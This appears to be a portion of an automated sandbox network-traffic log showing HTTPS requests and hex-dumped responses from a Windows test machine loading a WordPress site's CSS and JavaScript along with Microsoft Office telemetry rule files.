                                                                                                                                                                                                                              2024-10-23 18:04:08 UTC683INData Raw: 32 61 34 0d 0a 2e 65 6c 65 6d 65 6e 74 6f 72 2d 38 31 35 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 33 62 39 66 63 35 38 7b 70 61 64 64 69 6e 67 3a 30 70 78 20 30 70 78 20 30 70 78 20 30 70 78 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 38 31 35 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 31 34 61 36 37 34 34 20 3e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 31 70 78 20 31 70 78 20 31 70 78 20 31 70 78 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 46 31 46 31 46 31 3b 62 6f 72 64 65 72
                                                                                                                                                                                                                              Data Ascii: 2a4.elementor-815 .elementor-element.elementor-element-3b9fc58{padding:0px 0px 0px 0px;}.elementor-815 .elementor-element.elementor-element-14a6744 > .elementor-widget-container{border-style:solid;border-width:1px 1px 1px 1px;border-color:#F1F1F1;border
                                                                                                                                                                                                                              2024-10-23 18:04:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              79192.168.2.649813141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC573OUTGET /wp-content/uploads/elementor/css/post-2444.css HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:08 UTC477INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:07 GMT
                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Tue, 15 Oct 2024 19:09:49 GMT
                                                                                                                                                                                                                              ETag: W/"670ebdfd-7b5"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614818
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5d5c85a462f-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:08 UTC892INData Raw: 37 62 35 0d 0a 2e 65 6c 65 6d 65 6e 74 6f 72 2d 32 34 34 34 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 33 62 39 66 63 35 38 7b 70 61 64 64 69 6e 67 3a 30 70 78 20 30 70 78 20 30 70 78 20 30 70 78 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 32 34 34 34 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 63 62 33 64 39 36 31 20 3e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 70 6f 70 75 6c 61 74 65 64 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 61 63 6b 67 72 6f 75 6e 64 20 30 2e 33 73 2c 20 62 6f 72 64 65 72 20 30 2e 33 73 2c 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73
                                                                                                                                                                                                                              Data Ascii: 7b5.elementor-2444 .elementor-element.elementor-element-3b9fc58{padding:0px 0px 0px 0px;}.elementor-2444 .elementor-element.elementor-element-cb3d961 > .elementor-element-populated{border-style:none;transition:background 0.3s, border 0.3s, border-radius
                                                                                                                                                                                                                              2024-10-23 18:04:08 UTC1088INData Raw: 2d 6d 61 73 6b 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 3b 2d 77 65 62 6b 69 74 2d 6d 61 73 6b 2d 70 6f 73 69 74 69 6f 6e 3a 63 65 6e 74 65 72 20 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6d 61 73 6b 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 32 34 34 34 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 31 34 61 36 37 34 34 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 69 6d 61 67 65 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e 65 72 20 69 6d 67 7b 2d 77 65 62 6b 69 74 2d 6d 61 73 6b 2d 69 6d 61 67 65 3a 75 72 6c 28 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 61 63 69 6e 63 2e 6f 72 67 2f 77 70 2d 63 6f 6e
                                                                                                                                                                                                                              Data Ascii: -mask-size:contain;-webkit-mask-position:center center;-webkit-mask-repeat:no-repeat;}.elementor-2444 .elementor-element.elementor-element-14a6744.elementor-widget-image .elementor-widget-container img{-webkit-mask-image:url( https://www.tacinc.org/wp-con
                                                                                                                                                                                                                              2024-10-23 18:04:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              80192.168.2.64980913.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:07 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 400
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                                                              x-ms-request-id: 13d0f17b-b01e-0053-80f4-24cdf8000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180407Z-r1755647c66xrxq4nv7upygh4s00000002400000000046em
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:08 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              81192.168.2.64980313.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:07 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 478
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582B9B233827"
                                                                                                                                                                                                                              x-ms-request-id: 25f4145c-101e-005a-559b-24882b000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180407Z-r1755647c66vrwbmeqw88hpesn000000089g000000007w18
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:08 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              82192.168.2.64980413.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:07 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 404
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                                                              x-ms-request-id: e337ee23-e01e-003c-1ecf-20c70b000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180407Z-r1755647c66f2zlraraf0y5hrs000000073g000000003ydq
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:08 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              83192.168.2.64980713.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:08 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:08 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BB046B576"
                                                                                                                                                                                                                              x-ms-request-id: 114a99b0-b01e-0001-3128-2146e2000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180408Z-r1755647c66z4pt7cv1pnqayy400000008ng000000003w8x
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:08 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              84192.168.2.64981113.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:08 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:08 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 479
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                                                              x-ms-request-id: 0c1e413e-701e-0021-5e50-233d45000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180408Z-17fbfdc98bbx4f4q0941cebmvs000000063g000000002wdp
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:08 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              85192.168.2.649815141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:08 UTC688OUTGET /wp-content/uploads/hummingbird-assets/a0e9216368a65f19aaba6582fba739f2.js HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1
                                                                                                                                                                                                                              2024-10-23 18:04:08 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:08 GMT
                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Wed, 16 Oct 2024 14:55:47 GMT
                                                                                                                                                                                                                              ETag: W/"670fd3f3-d5ae"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614819
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5db3a644793-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:08 UTC877INData Raw: 37 64 63 35 0d 0a 2f 2a 2a 68 61 6e 64 6c 65 73 3a 63 6f 6f 6b 69 65 2d 6c 61 77 2d 69 6e 66 6f 2c 73 70 62 2d 66 72 6f 6e 74 65 6e 64 2d 6a 73 2d 6d 69 6e 2c 69 6d 61 67 65 73 4c 6f 61 64 65 64 2c 6a 71 75 65 72 79 2d 76 69 65 77 70 6f 72 74 73 2c 6a 71 75 65 72 79 2d 73 6d 61 72 74 72 65 73 69 7a 65 2a 2a 2f 0d 0a 43 4c 49 5f 41 43 43 45 50 54 5f 43 4f 4f 4b 49 45 5f 4e 41 4d 45 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 43 4c 49 5f 41 43 43 45 50 54 5f 43 4f 4f 4b 49 45 5f 4e 41 4d 45 3f 43 4c 49 5f 41 43 43 45 50 54 5f 43 4f 4f 4b 49 45 5f 4e 41 4d 45 3a 22 76 69 65 77 65 64 5f 63 6f 6f 6b 69 65 5f 70 6f 6c 69 63 79 22 2c 43 4c 49 5f 50 52 45 46 45 52 45 4e 43 45 5f 43 4f 4f 4b 49 45 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79
                                                                                                                                                                                                                              Data Ascii: 7dc5/**handles:cookie-law-info,spb-frontend-js-min,imagesLoaded,jquery-viewports,jquery-smartresize**/CLI_ACCEPT_COOKIE_NAME="undefined"!=typeof CLI_ACCEPT_COOKIE_NAME?CLI_ACCEPT_COOKIE_NAME:"viewed_cookie_policy",CLI_PREFERENCE_COOKIE="undefined"!=ty
                                                                                                                                                                                                                              2024-10-23 18:04:08 UTC1369INData Raw: 26 26 28 69 3d 68 6f 73 74 5f 6e 61 6d 65 2e 72 65 70 6c 61 63 65 28 22 77 77 77 22 2c 22 22 29 2c 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 65 2b 22 3d 22 2b 74 2b 6f 2b 6e 2b 22 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 22 2b 69 2b 22 3b 22 29 2c 68 6f 73 74 5f 6e 61 6d 65 3d 68 6f 73 74 5f 6e 61 6d 65 2e 73 75 62 73 74 72 69 6e 67 28 68 6f 73 74 5f 6e 61 6d 65 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 2e 22 2c 68 6f 73 74 5f 6e 61 6d 65 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 2e 22 29 2d 31 29 29 2c 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 65 2b 22 3d 22 2b 74 2b 6f 2b 6e 2b 22 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 22 2b 68 6f 73 74 5f 6e 61 6d 65 2b 22 3b 22 29 7d 2c 72 65 61 64 3a 66 75 6e 63 74 69 6f 6e 28 65 29
                                                                                                                                                                                                                              Data Ascii: &&(i=host_name.replace("www",""),document.cookie=e+"="+t+o+n+"; path=/; domain="+i+";"),host_name=host_name.substring(host_name.lastIndexOf(".",host_name.lastIndexOf(".")-1)),document.cookie=e+"="+t+o+n+"; path=/; domain="+host_name+";")},read:function(e)
